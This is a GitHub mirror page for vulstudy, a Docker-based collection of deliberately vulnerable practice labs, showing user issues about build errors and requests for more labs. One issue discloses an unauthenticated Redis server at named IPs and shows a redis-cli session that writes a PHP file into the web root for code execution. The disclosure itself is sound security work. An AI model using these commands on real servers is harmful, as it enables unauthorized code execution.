c0ny1 / vulstudy Goto Github PK

View Code? Open in Web Editor NEW

2.2K 61.0 478.0 1.42 MB

使用docker快速搭建各大漏洞靶场，目前可以一键搭建17个靶场。

Shell 70.91% Dockerfile 29.09%

docker-image-builder vulnerability

vulstudy's People

Contributors

Stargazers

Watchers

Forkers

sheldon1998 dm2333 unclejim eniac888 yeyingtomorrow dptechma popmedd rongqinglee f8syw5v zminjiao bloodzer0 hi-kk xietianliao lnln1111 chencool antime gxxg passtion dr-34m-3r qsdj pygain11 xiajunyi suwall conanjun happyu319 chuiy rh2002 rabitw free-me sttscc beingeasy lovebair2022 lsecly kwb0716 w7374520 wonaikeke1 nessastein byr0nchan myh4ck1ife erickcai pdkyll kmustriver raystyle nahtnahs ufwt dmgy10 gfkgfk xxxxxyyyy gitsucce-zz simlelcf stonezc v01cano sdhzdmzzl xiaomale hackpanda ws-weaklabs piggypage jaychouzzk mochizuki3310 sdfzy redwifiteam ifishzz 895515845 linlovephz 8899man windy222 waynetest xsr7yer dongwgnod selfevo wpczoe syydsn jiuburangshi r0ckylua hkwolf weypro harry1080 qing-q jeslee666 rainser chirec squallgold huangyuan666 lotus321 hafei waytoking ph34n6x iceshijie style-404 knighttt7 freeide z3r023 lforigin helinze 1621740748 odfajgjoednkautgtni shadow-zz thatqier hanstudio qhxb

vulstudy's Issues

运行 DSVW时出现错误

Step 22/30 : ADD build/default /etc/nginx/sites-available/default
ERROR: Service 'web' failed to build: ADD failed: file not found in build context or excluded by .dockerignore: stat build/default: file does not exist

postgre数据库安装失败

安装报错信息如下，希望能尽快解决下：

iwebsec这个平台也可以集成进去

WebGoat和vulnerable-node无法访问

webGoat：

vulnerable-node

Misconfigured redis server

Redis instance (1.14.157.192) is accepting anonymous connections at port 6379, you can start enumerating the service after connecting anonymously to :

redis-cli -h 52.9.41.95

In both the cases you will have authenticated access to the server and you can enumerate anything in it. I am able to enumerate client list, check pidfile location, perform remote code execution, view real time logs on it.

RCE:
1.14.157.192:6379> config set dir /var/www/html
OK
1.14.157.192:6379> config set dbfilename redis.php
OK
(1.50s)
1.14.157.192:6379> set test ""
OK
(1.30s)
1.14.157.192:6379> save
(error) ERR
(0.52s)
1.14.157.192:6379> bgsave
Background saving started
(1.20s)
1.14.157.192:6379>

Client list exposes the internal servers but I can only see my IP in it right now maybe you guys don't connect on this a lot but still secure it by restricting the port to only tcp and put noauth if udp is required.

靶场/漏洞学习平台增加~

大佬怎么不把你项目里的文件上传和 XXE 的两个靶场一起做进去，这样岂不是更完美，另外不知大佬有没有听说一个叫XSS挑战之旅的 xss靶场，我觉得也很不错，大佬可以一起做进去，如果没有资源的话，我这边可以发你~

add

补充一些BWVS、DoraBox、Wooyun_DVWA、 ZVulDrill、 XVWA 、OWASP Security Shepherd、WebGoat、WAVSEP、各类xss挑战

DVWA 反射性 xss 失效

建议升级下在vagrant+vitulbox层面搭建虚拟机来替换这个docker

用虚拟机的box集群管理还可以实现更完整的模拟windows+iis的漏洞。

#漏洞平台添加

大佬不考虑整合一下pikachu吗

A bug in Dockerfile

vulstudy/DVWA/Dockerfile

Line 21 in d41ac42

rm -rf /tmp/* && \

Hi, we are developing a tool to detect typos/bugs in dockerfiles automatically. Our tool finds a potential bug above. Is it a bug? we think you want to delete "&& \" at the end of the line. Our tool is currently available here https://wangluochao902.github.io/clcheck/

WebGoat启动命令中建议增加环境变量WEBWOLF_HOST和WEBWOLF_PORT

创建WebWolf容器时如果不是使用的的默认ip和端口 http://localhost:8081
在WebGoat Admin password reset 这一关填写邮件地址后会导致无法发送邮件给WebWolf
例如: http://10.1.1.111:8080/WebGoat/start.mvc#lesson/Challenge7.lesson